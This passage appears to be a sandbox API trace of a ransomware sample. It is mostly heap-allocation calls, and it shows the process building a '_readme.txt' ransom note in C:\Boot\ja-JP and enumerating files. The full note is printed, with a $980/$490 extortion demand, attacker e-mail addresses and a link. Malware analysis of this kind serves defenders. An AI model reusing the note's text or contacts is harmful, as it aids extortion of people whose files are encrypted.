hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.205] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0180.205] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.205] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.205] PathFindFileNameW (pszPath="") returned="" [0180.206] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.206] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.206] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.206] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.206] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0180.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.207] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0180.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.207] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.207] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.207] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.209] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*" (normalized: "c:\\boot\\ja-jp\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.210] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.210] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.210] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.210] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.211] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: 